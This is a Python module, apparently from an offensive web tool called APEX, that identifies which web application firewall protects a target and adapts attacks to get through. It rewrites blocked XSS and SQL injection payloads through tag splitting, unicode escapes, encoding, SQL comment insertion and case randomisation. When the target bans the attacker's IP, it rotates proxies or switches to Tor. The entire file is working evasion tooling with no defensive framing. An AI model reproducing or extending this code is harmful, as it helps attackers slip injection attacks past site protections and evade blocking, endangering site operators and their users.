"""
APEX v3.0 — Defense Evasion Engine
Auto-adapts to WAF, IDS, rate limiting, and IP bans in real-time.
"""

import time
import random
import threading
from datetime import datetime
from urllib.parse import urlparse


class DefenseEvasion:
    """Real-time defense detection and auto-adaptation engine."""
    
    def __init__(self):
        self.defense_state = {}
        self.adaptation_history = []
        self.waf_signatures = {
            'Cloudflare': {
                'headers': ['cf-ray', '__cfduid', 'cf-request-id'],
                'status_codes': [403, 503],
                'body_patterns': ['cloudflare', 'attention required', 'cf-browser-verification']
            },
            'AWS WAF': {
                'headers': ['x-amzn-requestid', 'x-amz-cf-id'],
                'status_codes': [403],
                'body_patterns': ['request blocked', 'aws waf']
            },
            'ModSecurity': {
                'headers': [],
                'status_codes': [403, 406],
                'body_patterns': ['mod_security', 'this request was blocked', 'not acceptable']
            },
            'Imperva': {
                'headers': ['x-cdn', 'x-iinfo'],
                'status_codes': [403],
                'body_patterns': ['incapsula', 'imperva', 'blocked']
            },
            'Akamai': {
                'headers': ['x-akamai-transformed', 'x-akamai-request-id'],
                'status_codes': [403],
                'body_patterns': ['akamai', 'access denied']
            },
            'F5 BIG-IP': {
                'headers': ['x-wa-info'],
                'status_codes': [403],
                'body_patterns': ['the requested url was rejected', 'big-ip']
            },
            'Sucuri': {
                'headers': ['x-sucuri-id', 'x-sucuri-cache'],
                'status_codes': [403],
                'body_patterns': ['sucuri', 'access denied', 'cloudproxy']
            },
            'Wordfence': {
                'headers': [],
                'status_codes': [403, 503],
                'body_patterns': ['wordfence', 'generated by wordfence', 'blocked by firewall']
            }
        }
        self.current_waf = None
        self.block_count = 0
        self.rate_limit_detected = False
        self.ip_ban_detected = False
        self.adaptation_active = False
    
    def detect_defenses(self, response):
        """Analyze a response to detect WAF, rate limiting, or IP bans."""
        host = urlparse(response.url).netloc if hasattr(response, 'url') else 'unknown'
        
        if host not in self.defense_state:
            self.defense_state[host] = {
                'waf_detected': None,
                'rate_limited': False,
                'ip_banned': False,
                'block_count': 0,
                'last_block_time': None,
                'consecutive_blocks': 0
            }
        
        state = self.defense_state[host]
        status = response.status_code if hasattr(response, 'status_code') else 0
        headers = response.headers if hasattr(response, 'headers') else {}
        body = response.text if hasattr(response, 'text') else ''
        
        # Detect WAF
        detected_waf = self._detect_waf(status, headers, body)
        if detected_waf:
            state['waf_detected'] = detected_waf
            self.current_waf = detected_waf
        
        # Detect rate limiting
        if status == 429:
            state['rate_limited'] = True
            self.rate_limit_detected = True
            state['consecutive_blocks'] += 1
            state['last_block_time'] = datetime.now()
        
        # Detect IP ban
        if status in (403, 401) and 'blocked' in body.lower():
            state['ip_banned'] = True
            self.ip_ban_detected = True
            state['block_count'] += 1
            state['consecutive_blocks'] += 1
            state['last_block_time'] = datetime.now()
        
        # Reset consecutive blocks if request succeeded
        if status == 200:
            state['consecutive_blocks'] = 0
        
        return state
    
    def _detect_waf(self, status_code, headers, body):
        """Identify which WAF is protecting the target."""
        body_lower = body.lower() if body else ''
        headers_lower = {k.lower(): v for k, v in (headers.items() if headers else {})}
        
        for waf_name, signature in self.waf_signatures.items():
            # Check status codes
            if status_code in signature['status_codes']:
                # Check headers
                for header in signature['headers']:
                    if header.lower() in headers_lower:
                        return waf_name
                # Check body patterns
                for pattern in signature['body_patterns']:
                    if pattern.lower() in body_lower:
                        return waf_name
        
        return None
    
    def handle_403(self, target_url, original_payload, vuln_type='xss'):
        """Handle 403 Forbidden responses by switching evasion strategies."""
        self.adaptation_history.append({
            'timestamp': datetime.now().isoformat(),
            'trigger': '403_forbidden',
            'target': target_url,
            'action': 'switching_evasion'
        })
        
        # Generate alternative payloads
        alternatives = []
        
        if vuln_type == 'xss':
            alternatives = [
                self._obfuscate_xss_payload(original_payload),
                self._encode_payload(original_payload, 'url'),
                self._encode_payload(original_payload, 'hex'),
                self._case_randomize(original_payload),
                self._split_payload(original_payload)
            ]
        elif vuln_type == 'sqli':
            alternatives = [
                self._obfuscate_sqli_payload(original_payload),
                self._encode_payload(original_payload, 'url'),
                self._add_sqli_comments(original_payload),
                self._case_randomize(original_payload)
            ]
        else:
            alternatives = [
                self._encode_payload(original_payload, 'url'),
                self._encode_payload(original_payload, 'hex'),
                self._case_randomize(original_payload)
            ]
        
        return {
            'detected': True,
            'waf': self.current_waf,
            'original_payload': original_payload,
            'alternatives': alternatives,
            'recommendation': 'Use polymorphic engine for maximum evasion'
        }
    
    def handle_rate_limit(self, target_url):
        """Handle rate limiting by auto-throttling requests."""
        host = urlparse(target_url).netloc
        state = self.defense_state.get(host, {})
        consecutive = state.get('consecutive_blocks', 0)
        
        # Exponential backoff
        backoff_time = min(60, 2 ** consecutive)
        
        self.adaptation_history.append({
            'timestamp': datetime.now().isoformat(),
            'trigger': 'rate_limit',
            'target': target_url,
            'action': f'backoff_{backoff_time}s'
        })
        
        time.sleep(backoff_time)
        
        return {
            'detected': True,
            'backoff_seconds': backoff_time,
            'consecutive_blocks': consecutive,
            'recommendation': 'Reduce request rate or rotate proxies'
        }
    
    def handle_ip_ban(self, target_url):
        """Handle IP ban by rotating proxy/VPN."""
        self.adaptation_history.append({
            'timestamp': datetime.now().isoformat(),
            'trigger': 'ip_ban',
            'target': target_url,
            'action': 'rotate_identity'
        })
        
        # Try to rotate proxy
        try:
            from modules.anonymity.proxy_manager import proxy_manager
            proxy_manager.rotate_proxy()
        except:
            pass
        
        # Try to enable Tor
        try:
            from modules.anonymity.tor_manager import tor_manager
            if not tor_manager.is_connected():
                tor_manager.connect()
        except:
            pass
        
        return {
            'detected': True,
            'action': 'identity_rotated',
            'recommendation': 'Use Tor or VPN for continued access'
        }
    
    def auto_adapt(self, response, target_url, payload, vuln_type='xss'):
        """Automatically adapt to any detected defense."""
        self.adaptation_active = True
        
        defense = self.detect_defenses(response)
        host = urlparse(target_url).netloc
        state = self.defense_state.get(host, {})
        
        result = {
            'adapted': False,
            'defense_type': None,
            'actions_taken': [],
            'new_payload': payload
        }
        
        # Handle WAF blocks
        if state.get('waf_detected') or response.status_code in (403, 406):
            waf_result = self.handle_403(target_url, payload, vuln_type)
            result['adapted'] = True
            result['defense_type'] = 'waf'
            result['actions_taken'].append('waf_evasion')
            if waf_result.get('alternatives'):
                result['new_payload'] = waf_result['alternatives'][0]
        
        # Handle rate limiting
        if response.status_code == 429:
            rate_result = self.handle_rate_limit(target_url)
            result['adapted'] = True
            result['defense_type'] = result['defense_type'] or 'rate_limit'
            result['actions_taken'].append('throttled')
        
        # Handle IP bans
        if state.get('ip_banned') or state.get('block_count', 0) > 3:
            ban_result = self.handle_ip_ban(target_url)
            result['adapted'] = True
            result['defense_type'] = result['defense_type'] or 'ip_ban'
            result['actions_taken'].append('identity_rotated')
        
        self.adaptation_active = False
        return result
    
    def _obfuscate_xss_payload(self, payload):
        """Apply XSS-specific obfuscation."""
        obfuscations = [
            payload.replace('<script>', '<scr<script>ipt>'),
            payload.replace('alert', 'al\\u0065rt'),
            payload.replace('onerror', 'o\\u006eerror'),
            payload.replace('<', '%3C').replace('>', '%3E'),
            payload.replace('"', '"').replace("'", '&#39;'),
        ]
        return random.choice(obfuscations)
    
    def _obfuscate_sqli_payload(self, payload):
        """Apply SQLi-specific obfuscation."""
        obfuscations = [
            payload.replace(' ', '/**/'),
            payload.replace('=', ' LIKE '),
            payload.replace("'", '"'),
            payload.replace('OR', '||'),
            payload.replace('AND', '&&'),
        ]
        return random.choice(obfuscations)
    
    def _encode_payload(self, payload, encoding='url'):
        """Encode payload using specified method."""
        from urllib.parse import quote
        if encoding == 'url':
            return quote(payload, safe='')
        elif encoding == 'hex':
            return ''.join(f'%{ord(c):02x}' for c in payload)
        return payload
    
    def _case_randomize(self, payload):
        """Randomize case of alphabetic characters."""
        return ''.join(c.upper() if random.random() > 0.5 else c.lower() for c in payload)
    
    def _split_payload(self, payload):
        """Split payload into concatenated parts."""
        mid = len(payload) // 2
        return f'"{payload[:mid]}"+"{payload[mid:]}"'
    
    def _add_sqli_comments(self, payload):
        """Add inline comments to SQLi payload."""
        comment_styles = ['/**/', '/**//**/', '/**/ /***/']
        result = ''
        for char in payload:
            result += char
            if char == ' ':
                result += random.choice(comment_styles)
        return result
    
    def get_defense_report(self, target_url=None):
        """Get a report of all detected defenses."""
        if target_url:
            host = urlparse(target_url).netloc
            state = self.defense_state.get(host, {})
            return {
                'target': target_url,
                'waf': state.get('waf_detected', 'None'),
                'rate_limited': state.get('rate_limited', False),
                'ip_banned': state.get('ip_banned', False),
                'block_count': state.get('block_count', 0),
                'consecutive_blocks': state.get('consecutive_blocks', 0)
            }
        
        return {
            'targets_tracked': len(self.defense_state),
            'current_waf': self.current_waf,
            'rate_limit_detected': self.rate_limit_detected,
            'ip_ban_detected': self.ip_ban_detected,
            'total_adaptations': len(self.adaptation_history),
            'recent_adaptations': self.adaptation_history[-5:]
        }


# Singleton instance
defense_evasion = DefenseEvasion()